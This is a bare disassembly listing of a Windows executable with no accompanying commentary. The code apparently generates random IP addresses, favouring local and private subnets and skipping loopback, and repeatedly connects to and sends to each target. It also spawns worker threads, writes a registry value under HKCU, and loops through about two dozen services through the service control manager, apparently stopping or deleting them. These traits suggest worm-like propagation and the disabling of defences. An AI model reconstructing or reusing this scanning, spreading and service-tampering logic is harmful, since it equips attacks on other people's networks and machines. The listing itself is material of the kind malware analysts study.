lea eax, [ebp+var_4039]
push eax
push [ebp+var_54]
call sub_41E405
cmp eax, 0FFFFFFFFh
jnz short $+2
loc_41DB9F: ; CODE XREF: sub_41D569+5CC�j
; sub_41D569+5CE�j
push 64h
call sub_41E5B1
and [ebp+var_3054], 0
loc_41DBAD: ; CODE XREF: sub_41D569+216�j
; sub_41D569+258�j ...
push 2
push [ebp+var_54]
call sub_41E411
loc_41DBB7: ; CODE XREF: sub_41D569+1CE�j
push [ebp+var_54]
call sub_41E399
loc_41DBBF: ; CODE XREF: sub_41D569+53�j
mov eax, [ebp+var_3054]
pop edi
pop esi
pop ebx
leave
retn
sub_41D569 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DBCA proc near ; CODE XREF: .data:loc_41DC3E�p
var_32 = byte ptr -32h
push ebp
mov ebp, esp
sub esp, 34h
push esi
push edi
push 31h
lea eax, [ebp+var_32]
push eax
call sub_41E3BD
cmp eax, 0FFFFFFFFh
jnz short loc_41DBE6
xor eax, eax
jmp short loc_41DC00
; ---------------------------------------------------------------------------
loc_41DBE6: ; CODE XREF: sub_41DBCA+16�j
lea eax, [ebp+var_32]
push eax
call sub_41E3B1
mov edi, eax
or edi, edi
jnz short loc_41DBF9
xor eax, eax
jmp short loc_41DC00
; ---------------------------------------------------------------------------
loc_41DBF9: ; CODE XREF: sub_41DBCA+29�j
mov eax, [edi+0Ch]
mov esi, [eax]
mov eax, [esi]
loc_41DC00: ; CODE XREF: sub_41DBCA+1A�j
; sub_41DBCA+2D�j
pop edi
pop esi
leave
retn
sub_41DBCA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
push edi
call sub_41E539
push eax
call sub_41E755
mov esi, 254h
mov eax, esi
add eax, 0Ah
push eax
push 0
call sub_41E575
mov ebx, eax
push esi
push 4040BFh
push ebx
call sub_41E70D
add esp, 10h
loc_41DC3E: ; CODE XREF: .data:0041DC58�j
; .data:0041DC92�j ...
call sub_41DBCA
mov [ebp-10Ch], eax
or eax, eax
jnz short loc_41DC5A
push 384h
call sub_41E6F5
pop ecx
jmp short loc_41DC3E
; ---------------------------------------------------------------------------
loc_41DC5A: ; CODE XREF: .data:0041DC4B�j
mov al, [ebp-10Ch]
mov [ebp-111h], al
mov al, [ebp-10Bh]
mov [ebp-112h], al
mov al, [ebp-10Ah]
mov [ebp-135h], al
cmp byte ptr [ebp-111h], 7Fh
jnz short loc_41DC94
push 384h
call sub_41E6F5
pop ecx
jmp short loc_41DC3E
; ---------------------------------------------------------------------------
loc_41DC94: ; CODE XREF: .data:0041DC85�j
lea eax, [ebp-130h]
push eax
call sub_41D468
push 0
call sub_41E6F5
add esp, 8
call sub_41E731
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-134h], dl
call sub_41E731
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-131h], dl
call sub_41E731
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-132h], dl
call sub_41E731
mov ecx, 0Ah
cdq
idiv ecx
mov [ebp-133h], dl
mov al, [ebp-133h]
cmp al, 5
jnb short loc_41DD31
mov al, [ebp-112h]
mov [ebp-134h], al
mov al, [ebp-133h]
cmp al, 3
jnb short loc_41DD31
mov al, [ebp-135h]
mov [ebp-131h], al
loc_41DD31: ; CODE XREF: .data:0041DD0D�j
; .data:0041DD23�j
cmp byte ptr [ebp-111h], 0Ah
jnz short loc_41DD66
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
movzx eax, byte ptr [ebp-134h]
push eax
push 404D49h
lea eax, [ebp-130h]
push eax
call sub_41E749
add esp, 14h
loc_41DD66: ; CODE XREF: .data:0041DD38�j
movzx eax, byte ptr [ebp-111h]
cmp eax, 0ACh
jnz short loc_41DDC0
mov al, [ebp-112h]
cmp al, 0Fh
jbe short loc_41DDC0
cmp al, 21h
jnb short loc_41DDC0
call sub_41E731
movzx edi, byte ptr [ebp-132h]
push edi
movzx edi, byte ptr [ebp-131h]
push edi
mov edx, eax
and edx, 8000000Fh
jge short loc_41DDA6
dec edx
or edx, 0FFFFFFF0h
inc edx
loc_41DDA6: ; CODE XREF: .data:0041DD9F�j
mov edi, edx
add edi, 10h
push edi
push 404D3Ch
lea edi, [ebp-130h]
push edi
call sub_41E749
add esp, 14h
loc_41DDC0: ; CODE XREF: .data:0041DD72�j
; .data:0041DD7C�j ...
movzx eax, byte ptr [ebp-111h]
cmp eax, 0C0h
jnz short loc_41DE00
movzx eax, byte ptr [ebp-112h]
cmp eax, 0A8h
jnz short loc_41DE00
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
push 404D2Eh
lea eax, [ebp-130h]
push eax
call sub_41E749
add esp, 10h
loc_41DE00: ; CODE XREF: .data:0041DDCC�j
; .data:0041DDDA�j
lea eax, [ebp-130h]
push eax
call sub_41E3D5
cmp [ebp-10Ch], eax
jz loc_41DC3E
push dword ptr [ebp-10Ch]
call sub_41E3E1
movzx edi, word ptr ds:loc_404092+2
push edi
push eax
push 404D27h
lea edi, [ebp-0FFh]
push edi
call sub_41E749
add esp, 10h
loc_41DE40: ; CODE XREF: .data:0041DE69�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_41DE49: ; CODE XREF: .data:0041DE4E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41DE49
cmp eax, 19h
jz short loc_41DE6B
push 404D25h
lea eax, [ebp-0FFh]
push eax
call sub_41E761
add esp, 8
jmp short loc_41DE40
; ---------------------------------------------------------------------------
loc_41DE6B: ; CODE XREF: .data:0041DE53�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_41DE74: ; CODE XREF: .data:0041DE79�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41DE74
push eax
lea edi, [ebp-0FFh]
push edi
mov edi, ebx
add edi, 9
push edi
call sub_41E70D
add esp, 0Ch
lea eax, [ebp-130h]
push eax
call sub_41E3D5
push esi
push ebx
push eax
call sub_41D569
add esp, 0Ch
mov [ebp-13Ch], eax
push 0
call sub_41E6F5
add esp, 4
jmp loc_41DC3E
; ---------------------------------------------------------------------------
db 5Fh, 5Eh, 5Bh
dd 4C2C9h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DEC4 proc near ; CODE XREF: .data:0041DF06�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_41E545
cmp eax, 80000000h
jb short loc_41DEDB
mov eax, 3Ch
jmp short locret_41DEFC
; ---------------------------------------------------------------------------
loc_41DEDB: ; CODE XREF: sub_41DEC4+E�j
push 0
lea eax, [ebp+var_4]
push eax
call sub_41E429
and [ebp+var_4], 2
cmp [ebp+var_4], 2
jnz short loc_41DEF7
mov eax, 12Ch
jmp short locret_41DEFC
; ---------------------------------------------------------------------------
loc_41DEF7: ; CODE XREF: sub_41DEC4+2A�j
mov eax, 64h
locret_41DEFC: ; CODE XREF: sub_41DEC4+15�j
; sub_41DEC4+31�j
leave
retn
sub_41DEC4 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_41DEC4
mov ebx, eax
lea eax, [ebp-4]
push eax
push 0
push 0
push offset sub_401565
push 0
push 0
call sub_41E5D5
push eax
call sub_41E52D
xor esi, esi
jmp short loc_41DF5F
; ---------------------------------------------------------------------------
loc_41DF2D: ; CODE XREF: .data:0041DF61�j
lea eax, [ebp-4]
push eax
push 0
push 0
push offset sub_401E23
push 0
push 0
call sub_41E5D5
push eax
call sub_41E52D
mov eax, 0EA60h
xor edx, edx
div ebx
mov [ebp-8], eax
mov edi, eax
push eax
call sub_41E6F5
pop ecx
inc esi
loc_41DF5F: ; CODE XREF: .data:0041DF2B�j
cmp esi, ebx
jb short loc_41DF2D
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DF6A proc near ; CODE XREF: sub_41E239+AC�p
var_388 = dword ptr -388h
var_384 = dword ptr -384h
var_380 = dword ptr -380h
var_37C = dword ptr -37Ch
var_378 = dword ptr -378h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_164 = dword ptr -164h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 388h
push ebx
push esi
push edi
lea edi, [ebp+var_16C]
lea esi, loc_404A37+1
mov ecx, 51h
rep movsd
and [ebp+var_24], 0
loc_41DF8D: ; CODE XREF: sub_41DF6A+211�j
push 0F003Fh
push 0
push 0
call sub_41E67D
mov [ebp+var_28], eax
or eax, eax
jz loc_41E174
push 0F003Fh
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_370], eax
push [ebp+eax+var_16C]
push [ebp+var_28]
call sub_41E689
mov ebx, eax
or eax, eax
jz loc_41E16C
lea eax, [ebp+var_20]
push eax
push 1
push ebx
call sub_41E665
mov [ebp+var_4], eax
and [ebp+var_4], 0
loc_41DFE5: ; CODE XREF: sub_41DF6A+A4�j
lea eax, [ebp+var_20]
push eax
push 4
push ebx
call sub_41E665
or eax, eax
jz short loc_41DFFB
cmp [ebp+var_1C], 1
jnz short loc_41DFFD
loc_41DFFB: ; CODE XREF: sub_41DF6A+89�j
jmp short loc_41E010
; ---------------------------------------------------------------------------
loc_41DFFD: ; CODE XREF: sub_41DF6A+8F�j
push 3E8h
call sub_41E5B1
inc [ebp+var_4]
cmp [ebp+var_4], 0Ah
jb short loc_41DFE5
loc_41E010: ; CODE XREF: sub_41DF6A:loc_41DFFB�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_374], eax
cmp [ebp+eax+var_168], 0
jz short loc_41E02E
push ebx
call sub_41E671
loc_41E02E: ; CODE XREF: sub_41DF6A+BC�j
push ebx
call sub_41E659
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_378], eax
cmp [ebp+eax+var_164], 0
jz loc_41E16C
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_37C], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 0
jnz loc_41E0F4
push 0
push 18h
lea eax, [ebp+var_36C]
push eax
push 0
call sub_41E435
or eax, eax
jz short loc_41E0F4
lea ecx, [ebp+var_36C]
or eax, 0FFFFFFFFh
loc_41E08D: ; CODE XREF: sub_41DF6A+128�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41E08D
mov [ebp+var_4], eax
cmp [ebp+var_4], 1
jbe short loc_41E0C1
mov eax, [ebp+var_4]
sub eax, 1
cmp [ebp+eax+var_36C], 5Ch
jz short loc_41E0C1
push offset sub_404BA0
lea eax, [ebp+var_36C]
push eax
call sub_41E761
add esp, 8
loc_41E0C1: ; CODE XREF: sub_41DF6A+131�j
; sub_41DF6A+141�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
lea eax, [ebp+var_36C]
push eax
call sub_41E761
add esp, 8
lea eax, [ebp+var_36C]
push eax
call sub_41E5E1
loc_41E0F4: ; CODE XREF: sub_41DF6A+FE�j
; sub_41DF6A+118�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 1
jnz short loc_41E16C
lea eax, [ebp+var_4]
push eax
push 20006h
push 0
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_384], eax
mov edx, [ebp+eax+var_164]
push dword ptr [edx+4]
mov eax, [ebp+eax+var_164]
push dword ptr [eax+0Ch]
call sub_41E6B9
or eax, eax
jnz short loc_41E16C
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_388], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
push [ebp+var_4]
call sub_41E695
push [ebp+var_4]
call sub_41E6AD
loc_41E16C: ; CODE XREF: sub_41DF6A+62�j
; sub_41DF6A+E0�j ...
push [ebp+var_28]
call sub_41E659
loc_41E174: ; CODE XREF: sub_41DF6A+36�j
inc [ebp+var_24]
cmp [ebp+var_24], 1Bh
jb loc_41DF8D
pop edi
pop esi
pop ebx
leave
retn 4
sub_41DF6A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov eax, [ebp+0Ch]
cmp eax, 10h
jz short loc_41E216
jg short loc_41E1A3
cmp eax, 2
jz short loc_41E20D
jmp loc_41E223
; ---------------------------------------------------------------------------
loc_41E1A3: ; CODE XREF: .data:0041E197�j
cmp eax, 113h
jnz short loc_41E223
and dword ptr [ebp-4], 0
mov dword ptr [ebp-8], 4
lea eax, [ebp-10h]
push eax
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
push 404B81h
push 404B85h
push 80000001h
call sub_41D1A8
mov eax, dword ptr ds:loc_404096+2
mov [ebp-0Ch], eax
add [ebp-4], eax
push 4
push 4
lea eax, [ebp-4]
push eax
push 404B81h
push 404B85h
push 80000001h
call sub_41D13D
add esp, 30h
push 0
push 404098h
call sub_41E55D
jmp short loc_41E234
; ---------------------------------------------------------------------------
loc_41E20D: ; CODE XREF: .data:0041E19C�j
push 0
call sub_41E629
jmp short loc_41E234
; ---------------------------------------------------------------------------
loc_41E216: ; CODE XREF: .data:0041E195�j
push dword ptr ds:loc_403000
call sub_41E641
jmp short loc_41E234
; ---------------------------------------------------------------------------
loc_41E223: ; CODE XREF: .data:0041E19E�j
; .data:0041E1A8�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41E64D
loc_41E234: ; CODE XREF: .data:0041E20B�j
; .data:0041E214�j ...
pop edi
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E239 proc near ; CODE XREF: sub_41E441+5C�p
var_2DC = byte ptr -2DCh
var_2D8 = byte ptr -2D8h
var_148 = dword ptr -148h
var_143 = byte ptr -143h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2DCh
push edi
mov edi, [ebp+arg_0]
push [ebp+arg_8]
push offset sub_403010
call sub_41E4C5
push 404B7Ch
lea eax, [ebp+var_143]
push eax
call sub_41E749
and [ebp+var_44], 0
lea eax, loc_4023A4+3
mov [ebp+var_40], eax
and [ebp+var_3C], 0
and [ebp+var_38], 0
mov [ebp+var_34], edi
and [ebp+var_30], 0
and [ebp+var_2C], 0
and [ebp+var_28], 0
and [ebp+var_24], 0
lea eax, [ebp+var_143]
mov [ebp+var_20], eax
lea eax, [ebp+var_44]
push eax
call sub_41E5F9
push 0
push edi
push 0
push 0
push 0
push 0
push 0
push 0
push 0CF0000h
push 404D25h
lea eax, [ebp+var_143]
push eax
push 0
call sub_41E635
mov dword ptr ds:loc_403000, eax
call sub_41E509
push eax
call sub_41D118
lea eax, [ebp+var_2D8]
push eax
push 2
call sub_41E375
push 0
call sub_41DF6A
lea eax, [ebp+var_2DC]
push eax
push 0
push 0
push 40211Dh
push 0
push 0
call sub_41E5D5
push eax
call sub_41E52D
and [ebp+var_148], 0
push 4
push 4
lea eax, [ebp+var_148]
push eax
push 404B81h
push 404B85h
push 80000001h
call sub_41D13D
add esp, 24h
push 0
push 2710h
push 1
push dword ptr ds:loc_403000
call sub_41E5ED
jmp short loc_41E35A
; ---------------------------------------------------------------------------
loc_41E348: ; CODE XREF: sub_41E239+132�j
lea eax, [ebp+var_1C]
push eax
call sub_41E611
lea eax, [ebp+var_1C]
push eax
call sub_41E61D
loc_41E35A: ; CODE XREF: sub_41E239+10D�j
push 0
push 0
push 0
lea eax, [ebp+var_1C]
push eax
call sub_41E605
or eax, eax
jnz short loc_41E348
pop edi
leave
retn 10h
sub_41E239 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E375 proc near ; CODE XREF: sub_41E239+A5�p
jmp dword ptr ds:loc_40524B+1
sub_41E375 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E381 proc near ; CODE XREF: .data:0041D43F�p
jmp dword ptr ds:loc_405250
sub_41E381 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E38D proc near ; CODE XREF: .data:0041D40C�p
jmp dword ptr ds:loc_405250+4
sub_41E38D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E399 proc near ; CODE XREF: .data:0041D33A�p
; sub_41D569+651�p
jmp dword ptr ds:loc_405255+3
sub_41E399 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E3A5 proc near ; CODE XREF: sub_41D569+1BA�p
jmp dword ptr ds:loc_40525B+1
sub_41E3A5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E3B1 proc near ; CODE XREF: sub_41DBCA+20�p
jmp dword ptr ds:loc_40525B+5
sub_41E3B1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E3BD proc near ; CODE XREF: sub_41DBCA+E�p
jmp dword ptr ds:loc_405261+3
sub_41E3BD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E3C9 proc near ; CODE XREF: .data:0041D3FA�p
; sub_41D569+197�p
jmp dword ptr ds:loc_405267+1
sub_41E3C9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E3D5 proc near ; CODE XREF: .data:0041DE07�p
; .data:0041DE98�p
jmp dword ptr ds:loc_40526C
sub_41E3D5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E3E1 proc near ; CODE XREF: sub_41D569+63�p
; .data:0041DE1E�p
jmp dword ptr ds:loc_405270
sub_41E3E1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E3ED proc near ; CODE XREF: .data:0041D42A�p
jmp dword ptr ds:loc_405274
sub_41E3ED endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E3F9 proc near ; CODE XREF: .data:0041D21A�p
; sub_41D569+20B�p ...
jmp dword ptr ds:loc_405278
sub_41E3F9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E405 proc near ; CODE XREF: .data:0041D26C�p
; .data:0041D2A8�p ...
jmp dword ptr ds:loc_405278+4
sub_41E405 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E411 proc near ; CODE XREF: .data:0041D332�p
; sub_41D569+649�p
jmp dword ptr ds:loc_40527D+3
sub_41E411 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E41D proc near ; CODE XREF: .data:0041D3C3�p
; sub_41D569+48�p
jmp dword ptr ds:loc_405284
sub_41E41D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E429 proc near ; CODE XREF: sub_41DEC4+1D�p
jmp dword ptr ds:loc_40528D+3
sub_41E429 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E435 proc near ; CODE XREF: sub_41DF6A+111�p
jmp dword ptr ds:loc_405299+3
sub_41E435 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E441 proc near ; CODE XREF: .data:0041D060�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_41E4FD
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_41E475
push 22h
mov eax, edi
inc eax
push eax
call sub_41E76D
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_41E490
mov edi, eax
inc edi
jmp short loc_41E46D
; ---------------------------------------------------------------------------
loc_41E46C: ; CODE XREF: sub_41E441+2F�j
inc edi
loc_41E46D: ; CODE XREF: sub_41E441+29�j
cmp byte ptr [edi], 20h
jz short loc_41E46C
jmp short loc_41E490
; ---------------------------------------------------------------------------
loc_41E474: ; CODE XREF: sub_41E441+3E�j
inc edi
loc_41E475: ; CODE XREF: sub_41E441+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_41E481
cmp eax, 20h
jnz short loc_41E474
loc_41E481: ; CODE XREF: sub_41E441+39�j
jmp short loc_41E484
; ---------------------------------------------------------------------------
loc_41E483: ; CODE XREF: sub_41E441+4D�j
inc edi
loc_41E484: ; CODE XREF: sub_41E441:loc_41E481�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_41E490
cmp eax, 20h
jz short loc_41E483
loc_41E490: ; CODE XREF: sub_41E441+24�j
; sub_41E441+31�j ...
push 0
call sub_41E521
push 1
push edi
push 0
push eax
call sub_41E239
pop edi
leave
retn
sub_41E441 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E4A5 proc near ; CODE XREF: sub_41D569+8�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_41E4A6: ; CODE XREF: sub_41E4A5+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_41E4A6
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_41E4A5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_41E4C5 proc near ; CODE XREF: sub_41E239+15�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_41E4C5 endp
; ---------------------------------------------------------------------------
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E4F1 proc near ; CODE XREF: .data:0041D380�p
jmp dword ptr ds:loc_4052A5+3
sub_41E4F1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E4FD proc near ; CODE XREF: sub_41E441+5�p
jmp dword ptr ds:loc_4052AB+1
sub_41E4FD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E509 proc near ; CODE XREF: sub_41E239+91�p
jmp dword ptr ds:loc_4052B0
sub_41E509 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E515 proc near ; CODE XREF: .data:0041D388�p
jmp dword ptr ds:loc_4052B0+4
sub_41E515 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E521 proc near ; CODE XREF: sub_41E441+51�p
jmp dword ptr ds:loc_4052B5+3
sub_41E521 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E52D proc near ; CODE XREF: .data:0041D3B8�p
; .data:0041D45C�p ...
jmp dword ptr ds:loc_4052BC
sub_41E52D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E539 proc near ; CODE XREF: .data:0041DC10�p
jmp dword ptr ds:loc_4052BC+4
sub_41E539 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E545 proc near ; CODE XREF: sub_41DEC4+4�p
jmp dword ptr ds:loc_4052C1+3
sub_41E545 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E551 proc near ; CODE XREF: sub_41D118+1E�p
jmp dword ptr ds:loc_4052C8
sub_41E551 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E55D proc near ; CODE XREF: .data:0041D356�p
; .data:0041E206�p
jmp dword ptr ds:loc_4052C8+4
sub_41E55D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E569 proc near ; CODE XREF: .data:0041D2FA�p
jmp dword ptr ds:loc_4052CD+3
sub_41E569 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E575 proc near ; CODE XREF: .data:0041D395�p
; .data:0041DC28�p
jmp dword ptr ds:loc_4052D4
sub_41E575 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E581 proc near ; CODE XREF: .data:0041D372�p
jmp dword ptr ds:loc_4052D4+4
sub_41E581 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E58D proc near ; CODE XREF: .data:0041D3B2�p
jmp dword ptr ds:loc_4052D9+3
sub_41E58D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E599 proc near ; CODE XREF: sub_41CE5B+13�p
jmp dword ptr ds:loc_4052DE+2
sub_41E599 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E5A5 proc near ; CODE XREF: .data:0041D3D0�p
; sub_41D569+17E�p
jmp dword ptr ds:loc_4052E4
sub_41E5A5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E5B1 proc near ; CODE XREF: .data:0041D2EE�p
; .data:0041D328�p ...
jmp dword ptr ds:loc_4052E5+3
sub_41E5B1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E5BD proc near ; CODE XREF: sub_41D569+72�p
jmp dword ptr ds:loc_4052EA+2
sub_41E5BD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E5C9 proc near ; CODE XREF: sub_41D569+BB�p
; sub_41D569+D9�p ...
jmp dword ptr ds:loc_4052ED+3
sub_41E5C9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E5D5 proc near ; CODE XREF: .data:0041D456�p
; .data:0041DF1E�p ...
jmp dword ptr ds:loc_4052F4
sub_41E5D5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E5E1 proc near ; CODE XREF: sub_41DF6A+185�p
jmp dword ptr ds:loc_4052F4+4
sub_41E5E1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E5ED proc near ; CODE XREF: sub_41E239+108�p
jmp dword ptr ds:loc_405302+2
sub_41E5ED endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E5F9 proc near ; CODE XREF: sub_41E239+60�p
jmp dword ptr ds:loc_405308
sub_41E5F9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E605 proc near ; CODE XREF: sub_41E239+12B�p
jmp dword ptr ds:sub_40530C
sub_41E605 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E611 proc near ; CODE XREF: sub_41E239+113�p
jmp dword ptr ds:loc_40530F+1
sub_41E611 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
